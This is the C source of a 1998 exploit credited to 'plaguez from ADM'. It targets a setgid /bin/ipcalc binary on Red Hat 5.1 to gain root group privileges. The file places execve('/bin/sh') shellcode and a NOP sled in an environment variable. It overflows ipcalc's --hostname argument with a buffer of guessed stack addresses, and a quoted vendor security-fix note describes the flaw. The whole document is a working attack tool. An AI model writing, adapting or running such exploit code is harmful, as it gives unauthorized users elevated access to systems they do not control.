/****   ADM PRIVATE -- DO NOT DISTRIBUTE

  one-minute RedHat 5.1 /bin/ipcalc exploit 
  by plaguez from ADM.  Gives you egid=0.

  Greets to all ADM ppl.

     * (02-Jun-1998) Security Fix:
       The /sbin/ipcalc binary in the Red Hat 5.1 initscripts had the
       setgid bit turned on inadvertently, which may give local users
       access to the root group (no exploit has been published yet).

****/


#include <stdio.h>
#include <unistd.h>


char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh\x0";



#define CHAINE "/bin/ipcalc --hostname \"12.12.12.1 $BIDULE\""
#define SCSIZE 4096
#define BOSIZE  240
#define DEFAULT -1000

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}


void main(int argc, char * argv[])
{
  char sc[SCSIZE],bo[BOSIZE];
  int offset = DEFAULT;
  long *addr;
   
  if(argc > 1) 
    offset -= atoi(argv[1]);

  addr = get_esp() - offset;
  
  printf("\ntarget addr: 0x%x\n",addr);
  
  for(addr=(long*)bo;addr<(long*)&bo[BOSIZE-1];addr++)
    *addr=get_esp()-offset;
  bo[BOSIZE-1]='\x0';
  
  memset(sc,'\x90',SCSIZE);
  memcpy(sc+SCSIZE-strlen(shellcode)-1,shellcode,strlen(shellcode));
  sc[SCSIZE-1]='\x0';
  
  setenv("MACHIN",sc,1);
  setenv("BIDULE",bo,1);

  system(CHAINE);

}